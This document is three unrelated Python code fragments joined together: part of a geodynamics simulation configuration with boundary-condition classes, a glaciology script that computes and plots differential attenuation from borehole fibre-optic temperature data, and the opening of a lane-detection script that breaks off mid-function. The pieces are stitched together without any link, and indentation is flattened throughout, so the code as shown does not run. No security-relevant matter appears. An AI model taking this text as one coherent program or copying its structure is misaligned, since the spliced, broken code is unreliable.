self.Density = SingleColorMap( number= 5)
self.Temperature = SingleColorMap( number= 6)
self.Stress = SingleColorMap( number= 7)
self.FluidPressure = SingleColorMap( number= 8)
self.Permeability = SingleColorMap(log10on=True, number= 9)
self.Porosity = SingleColorMap( number=10)
self.CompactionPressure = SingleColorMap( number=11)
self.Phase = SingleColorMap( number=12)
self.VxRes = SingleColorMap(log10on=True, number=13, scale=1e-6, maxValue=2.0)
self.VyRes = SingleColorMap(log10on=True, number=14, scale=1e-6, maxValue=2.0)
self.PRes = SingleColorMap(log10on=True, number=15, scale=1e-6, maxValue=2.0)
self.PfRes = SingleColorMap(log10on=True, number=16, scale=1e-6, maxValue=2.0)
self.PcRes = SingleColorMap(log10on=True, number=17, scale=1e-6, maxValue=2.0)
self.TRes = SingleColorMap(log10on=True, number=18, scale=1e-6, maxValue=2.0)
self.VelocityDiv = SingleColorMap( number=19, scale=1e-6, maxValue=2.0)
self.SIIOvYield = SingleColorMap( number=20, maxValue=1.5, center=1.0)
self.PeOvYield = SingleColorMap( number=21, maxValue=1.5, center=1.0)
self.Khi = SingleColorMap(log10on=True, number=22)
self.Khib = SingleColorMap(log10on=True, number=23)
self.Strain = SingleColorMap( number=24)
self.Vorticity = SingleColorMap( number=25)
self.POvPlitho = SingleColorMap( number=26, scale=1.0 , maxValue=2.0, center=1.0)
self.EffectiveViscosity = SingleColorMap(log10on=True, number=27)
self.ShearModulus = SingleColorMap(log10on=True, number=28)
self.ExtraField = SingleColorMap( number=29)
class Visu(Frozen):
_Frozen__List = ["type","typeParticles","showParticles","shiftFacX","shiftFacY","shiftFacZ","writeImages","transparency","alphaOnValue","showGlyphs","glyphType","glyphMeshType","glyphScale","glyphSamplingRateX","glyphSamplingRateY","width","height","outputFolder","retinaScale","particleMeshRes","particleMeshSize","filter","colorMap","typeNumber","shaderFolder","renderFrequency", "renderTimeFrequency","closeAtTheEndOfSimulation"]
def __init__(self):
self.type = "StrainRate" # Default
self.typeNumber = 0
self.typeParticles = "PartPhase" # Default
self.showParticles = True
self.shiftFacX = 0.00
self.shiftFacY = 0.00
self.shiftFacZ = -0.05
self.writeImages = False
self.transparency = False
self.alphaOnValue = False
self.showGlyphs = False
self.glyphType = "StokesVelocity"
self.glyphMeshType = "ThinArrow"
self.glyphScale = 0.05
self.glyphSamplingRateX = 3
self.glyphSamplingRateY = 6
self.width = 1024
self.height = 1024
self.outputFolder = "../../OutputStokesFD"
self.shaderFolder = "../Shaders/Default" # Relative path from the running folder (of StokesFD)
self.renderFrequency = 1 # Render every this number of steps
self.renderTimeFrequency = 0 # Render every this amount of time, if 0: then renderFrequency is used instead
self.retinaScale = 2
self.particleMeshRes = 6 # minimum 3, higher number make the particle voronoi diagram look smoother
self.particleMeshSize = 0.05
self.filter = "Linear"
self.colorMap = ColorMapList()
self.closeAtTheEndOfSimulation = True
def dictionarize(self):
self.colorMap = vars(self.colorMap)
for key in self.colorMap:
self.colorMap[key] = vars(self.colorMap[key])
def finalize(self):
self.dictionarize()
ListOfTypes = ("Blank", "Viscosity", "StrainRate", "Velocity", "Pressure", "Density", "Temperature", "Stress", "FluidPressure", "Permeability", "Porosity", "CompactionPressure", "Phase",
"VxRes", "VyRes", "PRes", "PfRes", "PcRes", "TRes", "VelocityDiv","SIIOvYield", "PeOvYield", "Khi", "Khib","Strain","Vorticity","POvPlitho", "EffectiveViscosity", "ShearModulus", "ExtraField")
self.typeNumber = ListOfTypes.index(self.type)
#Here goes the automatic computation of colormapRes
class Char(Frozen):
_Frozen__List = ["length","mass","time","temperature"]
def __init__(self):
self.length = 1.0
self.mass = 1.0
self.time = 1.0
self.temperature = 1.0
def set_based_on_strainrate(self,PhaseRef,BCStokes,BCThermal,Grid):
self.time = abs(1.0/BCStokes.backStrainRate)
self.length = (Grid.xmax-Grid.xmin)/2
self.temperature = (BCThermal.TB + BCThermal.TT)/2.0
        CharVisc = PhaseRef.getRefVisc(0,self.temperature,abs(BCStokes.backStrainRate))
        CharStress = 2*CharVisc*abs(BCStokes.backStrainRate) # stress scale: sigma = 2*eta*strainrate
        self.mass = CharStress*self.time*self.time*self.length # [stress] = kg/(m s^2) => kg = stress * s^2 * m
if (PhaseRef.isRef == False):
raise ValueError("PhaseRef.isRef == False")
def set_based_on_lithostatic_pressure(self,PhaseRef,BCStokes,BCThermal,Physics,Grid,Length=0):
if (Length == 0):
self.length = (Grid.ymax-Grid.ymin)/2.0
else:
self.length = Length
self.temperature = (BCThermal.TB + BCThermal.TT)/2.0
CharVisc = PhaseRef.getRefVisc(0,self.temperature,abs(BCStokes.backStrainRate))
CharStress = PhaseRef.rho0*abs(Physics.gy)*self.length
self.time = CharVisc/CharStress
self.mass = CharStress*self.time*self.time*self.length
if (PhaseRef.isRef == False):
raise ValueError("PhaseRef.isRef == False")
def set_based_on_corner_flow(self,PhaseRef,BCStokes,BCThermal,Physics,Grid,Length=0):
if (Length == 0):
self.length = (Grid.ymax-Grid.ymin)/2.0
else:
self.length = Length
self.temperature = (BCThermal.TB + BCThermal.TT)/2.0
CharVisc = PhaseRef.getRefVisc(0,self.temperature,abs(BCStokes.backStrainRate))
CharStress = CharVisc*BCStokes.refValue/self.length;
self.time = CharVisc/CharStress
self.mass = CharStress*self.time*self.time*self.length
if (PhaseRef.isRef == False):
raise ValueError("PhaseRef.isRef == False")
class CharExtra(Frozen):
_Frozen__List = ["visc","stress","strainrate"]
def __init__(self,Char):
kg = Char.mass
m = Char.length
s = Char.time
#K = Char.temperature
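        # derived scales follow from SI base units:
        #   viscosity   [Pa s] = kg/(m s)
        #   stress      [Pa]   = kg/(m s^2)
        #   strain rate        = 1/s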
self.visc = kg/m/s
self.stress = kg/m/s/s
self.strainrate = 1/s
class BC(Frozen):
_Frozen__List = ["Stokes","Thermal"]
def __init__(self):
self.Stokes = BCStokes()
self.Thermal = BCThermal()
class BCStokes(Frozen):
_Frozen__List = ["backStrainRate","SetupType","refValue","DeltaL","Sandbox_TopSeg00","Sandbox_TopSeg01","Sandbox_NoSlipWall","Corner_SubductionAngle",
"Bottom_frictionAngle","Bottom_cohesion","Bottom_staticPfFac","Bottom_type",
"instantErosion_xL", "instantErosion_yL", "instantErosion_xR", "instantErosion_yR", "instantErosion_use"]
def __init__(self):
self.backStrainRate = -1.0
self.SetupType = "PureShear"
self.refValue = 1.0
self.DeltaL = 1.0
self.Sandbox_TopSeg00 = 0.0
self.Sandbox_TopSeg01 = 0.0
self.Sandbox_NoSlipWall = False
self.Corner_SubductionAngle = 30.0/180.0*pi
self.Bottom_frictionAngle = 30.0/180.0*pi
self.Bottom_cohesion = 0.0
self.Bottom_staticPfFac = 0.0
self.Bottom_type = "inactive" # values can be: "inactive", "fixed", "weakenable"
# self.instantErosion_xL = 0.0
# self.instantErosion_yL = 0.0
# self.instantErosion_xR = 0.0
# self.instantErosion_yR = 0.0
# self.instantErosion_use = False
class BCThermal(Frozen):
_Frozen__List = ["TT","TB","SetupType","refValue","DeltaL"]
def __init__(self):
self.TT = 1.0
self.TB = 1.0
self.SetupType = "TT_TB_LRNoFlux"
self.refValue = 1.0
self.DeltaL = 1.0
class BCDarcy(Frozen):
    # the attribute list must match what __init__ sets, otherwise Frozen raises
    _Frozen__List = ["PfT_type","PfT_val","PfB_type","PfB_val","PfL_type","PfL_val","PfR_type","PfR_val"]
    def __init__(self):
        self.PfT_type = "Dirichlet"
        self.PfT_val = 0.0
        self.PfB_type = "Dirichlet"
        self.PfB_val = 0.0
        self.PfL_type = "Neumann"
        self.PfL_val = 0.0
        self.PfR_type = "Neumann"
        self.PfR_val = 0.0
#script to process cumulative attenuation DataSet from FO_diff_attenuation.py
#<NAME>, Scott Polar Research Institute, University of Cambridge, 2020. <EMAIL>
import os
import sys
import glob
import pickle
import datetime
import matplotlib
import numpy as np
import pandas as pd
import xarray as xr
import matplotlib.pyplot as plt
import matplotlib.patches as patch
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
#change working directory to the location of the python file
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))
#inputs
#channel 1
bh_start = 220.#211.944 #(m) apex of T dip at start of borehole
bh_end = 2319.844#2327.9 #(m) apex of T dip at end of borehole (up)
ta_start = 1266. #(m) start of the turnaround (using apex)
ta_end = 1271.58 #(m) end of the turnaround (using apex) (up)
#channel 3
bh_start3 = bh_start #(m) apex of T dip at start of borehole
bh_end3 = bh_end #(m) apex of T dip at end of borehole (up)
ta_start3 = 1267.39 #(m) start of the turnaround (using apex)
ta_end3 = 1271.46 #(m) end of the turnaround (using apex) (up)
z_start = 204. #(m) borehole start depth
fail_depth = 1109.5 - z_start #(m) at which point did the cable fail?
file_loc = 'processed_data/DataSet_ST_data_ch1.nc'
file_loc3 = 'processed_data/DataSet_ST_data_ch3.nc'
t_start = datetime.datetime(2019, 7, 5)
t_end = datetime.datetime(2019, 8, 14, 1)
t1 = datetime.datetime(2019, 7, 9)
t2 = datetime.datetime(2019, 7, 19)
t3 = datetime.datetime(2019, 7, 29)
t4 = datetime.datetime(2019, 7, 8)
#load
ds = xr.open_dataset(file_loc)
ds3 = xr.open_dataset(file_loc3)
#take z and t slice
ds = ds.sel(z=slice(bh_start, bh_end))
ds = ds.sel(t = slice(t_start, t_end))
ds3 = ds3.sel(z=slice(bh_start, bh_end))
ds3 = ds3.sel(t = slice(t_start, t_end))
#calculate differential attenuation
a = 0.5*( np.log(ds['ST'].values[1::,:]/ds['AST'].values[1::,:]) - np.log(ds['ST'].values[0:-1,:]/ds['AST'].values[0:-1,:])
+ np.log(ds['RST'].values[0:-1,:]/ds['RAST'].values[0:-1,:]) - np.log(ds['RST'].values[1::,:]/ds['RAST'].values[1::,:]) )
a3 = 0.5*( np.log(ds3['ST'].values[1::,:]/ds3['AST'].values[1::,:]) - np.log(ds3['ST'].values[0:-1,:]/ds3['AST'].values[0:-1,:])
+ np.log(ds3['RST'].values[0:-1,:]/ds3['RAST'].values[0:-1,:]) - np.log(ds3['RST'].values[1::,:]/ds3['RAST'].values[1::,:]) )
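#each term above is a Stokes/anti-Stokes log-ratio: differencing consecutive
#depth samples of the forward trace (ST/AST) and of the reverse trace
#(RST/RAST), then averaging, gives the per-step double-ended differential
#attenuation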
#cumulative sum and concatenate
a_cum = np.cumsum(a,axis=0)
a_cum = np.concatenate((a_cum, np.ones((1,len(ds.t.values)))*a_cum[-1,:] ), axis = 0)
a_cum3 = np.cumsum(a3,axis=0)
a_cum3 = np.concatenate((a_cum3, np.ones((1,len(ds3.t.values)))*a_cum3[-1,:] ), axis = 0)
da = xr.DataArray( a_cum,
dims = ('z', 't'),
coords= { 'z': ds.z.values,
't': ds.t.values})
da3 = xr.DataArray( a_cum3,
dims = ('z', 't'),
coords= { 'z': ds3.z.values,
't': ds3.t.values})
#resample
da = da.resample(t='48H').mean()
da_down = da.sel(z = slice(bh_start, ta_start))
da3 = da3.resample(t='48H').mean()
da_down3 = da3.sel(z = slice(bh_start3, ta_start3))
#vertical reflection of lower half
da_up = da.sel(z = slice(ta_end, bh_end))
da_up.values = 0 - da_up.values
da_up3 = da3.sel(z = slice(ta_end3, bh_end3))
da_up3.values = 0 - da_up3.values
#horizontal reflection
da_up.z.values = max(da_up.z.values) - da_up.z.values
da_up3.z.values = max(da_up3.z.values) - da_up3.z.values
#horizontal shift
da_up.values = da_up.values[:] + (da_down.values[0,:] - da_up.values[-1,:])
da_up3.values = da_up3.values[:] + (da_down3.values[0,:] - da_up3.values[-1,:])
#vertical shift
da_up.z.values = da_up.z.values + (da_down.z.values[0] - da_up.z.values[-1])
da_up3.z.values = da_up3.z.values + (da_down3.z.values[0] - da_up3.z.values[-1])
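#the cable runs down the borehole, through the turnaround and back up, so the
#"up" half is mirrored in depth and sign and shifted above to overlay the
#"down" half on a common depth axis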
#plots
# plt.plot(da_down.isel(t = -1), da_down.z, label='channel 1 down')
# plt.plot(da_up.isel(t = -1), da_up.z, label='channel 1 up')
# plt.plot(da_down3.isel(t = -1), da_down3.z, label='channel 3 down')
# plt.plot(da_up3.isel(t = -1), da_up3.z, label='channel 3 up')
# plt.legend()
# plt.gca().invert_yaxis()
# plt.show()
#plot inputs
#this entire plot has been altered for the revision supplementary figure; see v1-2 for the working version that produces the bottom half of figure 2
bh_start = 204.
bh_depth = 1042.95 #(m) from <NAME> BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth from DTS with refractive index error
y_axis = (da_down.z - bh_start)*(bh_depth/bh_depth_dts)
fail_depth = fail_depth*(bh_depth/bh_depth_dts)
xlim1 = 0.045
xlim2 = 0.058
lw = 0.8
fs = 8
inset_h = 1.15 #(inch)
inset_w = 1.15
CTZ_upper = 959
CTZ_lower = 982 + 40 #(m) interpreted depth of bottom of the CTZ + 40 for good measure
LGIT = 889 - 40 #(m) interpreted LGIT depth, with -40 for good measure
cu_top = 910
cu_bot = 925
up_an_top = 200
up_an_bot = 250
up_an_l = 0.0110
up_an_r = 0.0135
bot_an_top = 810
bot_an_bot = 1045
bot_an_l = 0.045
bot_an_r = 0.06
matplotlib.rcParams.update({'font.size': fs})
fig1, ax1 = plt.subplots(1, 5)
fig1.set_size_inches(7.3, 70/25.4)
fig1.subplots_adjust(wspace = 0.27)
fig1.subplots_adjust(hspace = 0.27)
ax1[0].plot(da_down.isel(t = 2), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[0].invert_yaxis()
ax1[0].set_ylim([CTZ_lower, LGIT])
ax1[0].set_xlim([xlim1, xlim2])
ax1[0].grid(True)
ax1[0].set_ylabel('Depth (m)', fontsize=fs)
ax1[0].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[0].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[0].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#date = pd.to_datetime(str(da.t.values[2]))
#date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
#ax1[0].text(0.051, 862, date_string, fontsize=fs)
ax1[1].plot(da_down.isel(t = 6), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[1].invert_yaxis()
ax1[1].set_ylim([CTZ_lower, LGIT])
ax1[1].set_xlim([xlim1, xlim2])
ax1[1].grid(True)
ax1[1].set_yticklabels([])
ax1[1].scatter(0.0046, 105, color='orange')
ax1[1].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[1].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[1].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[7]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_7')
print(date_string)
#ax1[1].text(0.051, 862, date_string, fontsize=fs)
ax1[2].plot(da_down.isel(t = 10), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[2].invert_yaxis()
ax1[2].set_ylim([CTZ_lower, LGIT])
ax1[2].set_xlim([xlim1, xlim2])
ax1[2].grid(True)
ax1[2].set_yticklabels([])
ax1[2].scatter(0.0046, 105, color='orange')
ax1[2].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[2].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[2].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#date = pd.to_datetime(str(da.t.values[12]))
#date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
#ax1[2].text(0.051, 862, date_string, fontsize=fs)
ax1[3].plot(da_down.isel(t = 14), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[3].invert_yaxis()
ax1[3].set_ylim([CTZ_lower, LGIT])
ax1[3].set_xlim([xlim1, xlim2])
ax1[3].grid(True)
ax1[3].set_yticklabels([])
ax1[3].scatter(0.0046, 105, color='orange')
ax1[3].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[3].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[3].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[17]))
print('date_17')
print(da_down.t.values)
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
#ax1[3].text(0.051, 862, date_string, fontsize=fs)
ax1[4].plot(da_down.isel(t = 18), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[4].invert_yaxis()
ax1[4].set_ylim([CTZ_lower, LGIT])
ax1[4].set_xlim([xlim1, xlim2])
ax1[4].grid(True)
ax1[4].set_yticklabels([])
ax1[4].scatter(0.0046, 105, color='orange')
ax1[4].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[4].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[4].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[0].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[1].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[2].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[3].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[4].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
fig1.text(0.5, 0.01, 'Integrated differential attenuation', fontsize = fs, ha='center')
plt.show()
#fig1.savefig('figures/integrated_attenuation_5.png', dpi=600, bbox_inches = 'tight', format='png')
#figure 2
fig2, ax2 = plt.subplots(1, 5)
fig2.set_size_inches(7.3, 70/25.4)
fig2.subplots_adjust(wspace = 0.27)
fig2.subplots_adjust(hspace = 0.27)
ax2[0].plot(da_down.isel(t = 2), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[0].invert_yaxis()
ax2[0].set_ylim([cu_bot, cu_top])
ax2[0].set_xlim([0.051, 0.055])
ax2[0].grid(True)
ax2[0].set_ylabel('Depth (m)', fontsize=fs)
ax2[0].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[0].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[0].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[2]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_2')
print(date_string)
#ax2[0].text(0.051, 862, date_string, fontsize=fs)
ax2[1].plot(da_down.isel(t = 6), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[1].invert_yaxis()
ax2[1].set_ylim([cu_bot, cu_top])
ax2[1].set_xlim([0.051, 0.055])
ax2[1].grid(True)
ax2[1].set_yticklabels([])
ax2[1].scatter(0.0046, 105, color='orange')
ax2[1].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[1].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[1].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[6]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_6')
print(date_string)
#ax2[1].text(0.051, 862, date_string, fontsize=fs)
ax2[2].plot(da_down.isel(t = 10), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[2].invert_yaxis()
ax2[2].set_ylim([cu_bot, cu_top])
ax2[2].set_xlim([0.051, 0.055])
ax2[2].grid(True)
ax2[2].set_yticklabels([])
ax2[2].scatter(0.0046, 105, color='orange')
ax2[2].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[2].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[2].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[10]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_10')
print(date_string)
#ax2[2].text(0.051, 862, date_string, fontsize=fs)
ax2[3].plot(da_down.isel(t = 14), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[3].invert_yaxis()
ax2[3].set_ylim([cu_bot, cu_top])
ax2[3].set_xlim([0.051, 0.055])
ax2[3].grid(True)
ax2[3].set_yticklabels([])
ax2[3].scatter(0.0046, 105, color='orange')
ax2[3].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[3].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[3].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[14]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_14')
print(date_string)
#ax2[3].text(0.051, 862, date_string, fontsize=fs)
ax2[4].plot(da_down.isel(t = 18), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[4].invert_yaxis()
ax2[4].set_ylim([cu_bot, cu_top])
ax2[4].set_xlim([0.051, 0.055])
ax2[4].grid(True)
ax2[4].set_yticklabels([])
ax2[4].scatter(0.0046, 105, color='orange')
ax2[4].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[4].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[4].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[18]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_18')
print(date_string)
fig2.text(0.5, 0.01, 'Integrated differential attenuation', fontsize = fs, ha='center')
#fig2.savefig('figures/integrated_attenuation.png', dpi=600, bbox_inches = 'tight', format='png')
plt.show()
sys.exit()
fig2, ax2 = plt.subplots(1, 2)
fig2.set_size_inches(7.3, 3.5)
rect5 = patch.Rectangle((up_an_l, up_an_bot), up_an_r - up_an_l, up_an_top - up_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
rect6 = patch.Rectangle((bot_an_l, bot_an_bot), bot_an_r - bot_an_l, bot_an_top - bot_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
rect7 = patch.Rectangle((up_an_l, up_an_bot), up_an_r - up_an_l, up_an_top - up_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
rect8 = patch.Rectangle((bot_an_l, bot_an_bot), bot_an_r - bot_an_l, bot_an_top - bot_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
#easier to put y_axis calculations in line as there are so many
ax2[0].plot(da_up.isel(t = 4), (da_up.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 1 up', lw = lw)
ax2[0].plot(da_down3.isel(t = 4), (da_down3.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 3 down', lw = lw)
ax2[0].plot(da_up3.isel(t = 4), (da_up3.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 3 up', lw = lw)
ax2[0].plot(da_down.isel(t = 4), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[0].invert_yaxis()
ax2[0].set_ylim([1045, 0])
ax2[0].set_xlim([-0.003, 0.0625])
ax2[0].grid(True)
ax2[0].set_ylabel('Depth (m)', fontsize=fs)
ax2[0].add_patch(rect5)
ax2[0].add_patch(rect6)
ax2[0].axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[4]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 4)
ax2[0].text(0.0045, 55, date_string, fontsize=fs)
ax2[1].plot(da_up.isel(t = -1), (da_up.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 1 up', lw = lw)
ax2[1].plot(da_down3.isel(t = -1), (da_down3.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 3 down', lw = lw)
<filename>advanced_lane_detection_main.py
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import glob
from moviepy.editor import VideoFileClip
left_fit_poly = []
right_fit_poly = []
objpoints = [] # 3D points
imgpoints = [] # 2D points
# nx and ny define the number of corners in x and y direction
nx = 9
ny = 6
# Using glob function, all the calibration images are used to calculate parameters
images = glob.glob('camera_cal\\calibration*.jpg')
objp = np.zeros((nx*ny, 3), np.float32)
objp[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2)
for fname in images:
# for each chessboard image, gray scale conversion is done
# the opencv function findChessboardCorners is used to detect corners
img = mpimg.imread(fname)
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)  # mpimg.imread returns RGB, so convert from RGB (not BGR)
ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)
if ret:
imgpoints.append(corners)
objpoints.append(objp)
# img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
def undistort_image(img_in, mtx_in, dist_in):
# This is the function which undistorts using the calibration parameters
dst = cv2.undistort(img_in, mtx_in, dist_in, None, mtx_in)
return dst
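# Illustrative usage sketch (not part of the original pipeline, kept commented out):
# undistort one of the calibration images with the parameters computed above.
# The file name below is an assumption for demonstration only.
# sample = mpimg.imread('camera_cal\\calibration1.jpg')  # hypothetical test image
# sample_undistorted = undistort_image(sample, mtx, dist)
# plt.imshow(sample_undistorted); plt.title('undistorted'); plt.show()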
def create_threshold_binary_image(undist_img):
# RGB to HLS Conversion
hls = cv2.cvtColor(undist_img, cv2.COLOR_RGB2HLS)
# using s channel and applying thresholds for lane detection
s_channel = hls[:, :, 2]
thresh_s_ch = (215, 255) # Threshold values found by testing
s_ch_binary = np.zeros_like(s_channel)
s_ch_binary[(s_channel >= thresh_s_ch[0]) & (s_channel <= thresh_s_ch[1])] = 1
# Sobel operator is applied to the undistorted gray image in x direction
# The sudden changes in image pixels are detected
gray_undist = cv2.cvtColor(undist_img, cv2.COLOR_RGB2GRAY)
sobel_kernel = 5
sobelx = cv2.Sobel(gray_undist, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
abs_sobel = np.absolute(sobelx)
scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))
thresh_sobel = (20, 100) # Threshold values are found by testing
sobel_x_binary = np.zeros_like(scaled_sobel)
sobel_x_binary[(scaled_sobel >= thresh_sobel[0]) & (scaled_sobel <= thresh_sobel[1])] = 1
# After some testing, it was found that in some situations the R channel
# detects the right lane better than the S channel, especially when
# light-colored road patches are in the frame.
r_channel = undist_img[:, :, 0]
thresh_r = (210, 255) # Threshold values are found by testing
binary_r = np.zeros_like(r_channel)
binary_r[(r_channel > thresh_r[0]) & (r_channel <= thresh_r[1])] = 1
# Creating a combined image with sobel, binary red and s channel binary
combined_binary = np.zeros_like(sobel_x_binary)
combined_binary[(sobel_x_binary == 1) | (binary_r == 1) | (s_ch_binary == 1)] = 1
return combined_binary
def perspective_transform(cmb_bin_img):
# trapezoid to be transformed
src = np.float32(
[[580, 460],
[1110, 720],
[205, 720],
[703, 460]])
# rectangular area on which the above trapezoid is warped to
dst = np.float32(
[[320, 0],
[960, 720],
[320, 720],
[960, 0]])
# Getting perspective transform matrix and warping the image
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
image_size = (cmb_bin_img.shape[1], cmb_bin_img.shape[0])
warped_img = cv2.warpPerspective(cmb_bin_img, M, image_size, flags=cv2.INTER_LINEAR)
return warped_img, Minv
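# Illustrative sketch of chaining the steps above on a single frame (commented out so the
# module behaviour is unchanged). 'test_images/test1.jpg' is a hypothetical path.
# frame = mpimg.imread('test_images/test1.jpg')
# undist = undistort_image(frame, mtx, dist)
# binary = create_threshold_binary_image(undist)
# warped, Minv = perspective_transform(binary)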
def find_lane_pixels(img_warped):
# The histogram of the lower bottom of the image is taken.
# High values in the histogram point towards lanes in those regions
# Lane lines are likely to be mostly vertical nearest to the car
bottom_half = img_warped[img_warped.shape[0] // 2:, :]
histogram = np.sum(bottom_half, axis=0)
out_img = np.dstack((img_warped, img_warped, img_warped))*255
mid_point = int(histogram.shape[0] // 2)  # use builtin int; np.int was removed in recent NumPy
left_x_base = np.argmax(histogram[:mid_point])
right_x_base = np.argmax(histogram[mid_point:]) + mid_point
# Sliding windows method is used to find lanes
nwindows = 9 # Number of sliding windows
margin = 80 # Width of the window
minpix = 50 # Minimum number of pixels to be found to recenter window
# Size of each window is image height divided by number of windows
win_height = int(img_warped.shape[0] // nwindows)
non_zero_pixels = img_warped.nonzero()
non_zero_y = np.array(non_zero_pixels[0])
non_zero_x = np.array(non_zero_pixels[1])
# Current position to be updated later for each window
left_x_current = left_x_base
right_x_current = right_x_base
# Empty lists to receive the indices of left and right lane pixels
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Upper and lower boundaries of the window
win_y_low = img_warped.shape[0] - (window + 1) * win_height
win_y_high = img_warped.shape[0] - window * win_height
# left and right boundaries of the window
win_xleft_low = left_x_current - margin
win_xleft_high = left_x_current + margin
win_xright_low = right_x_current - margin
win_xright_high = right_x_current + margin
# Draw the windows on the visualization image
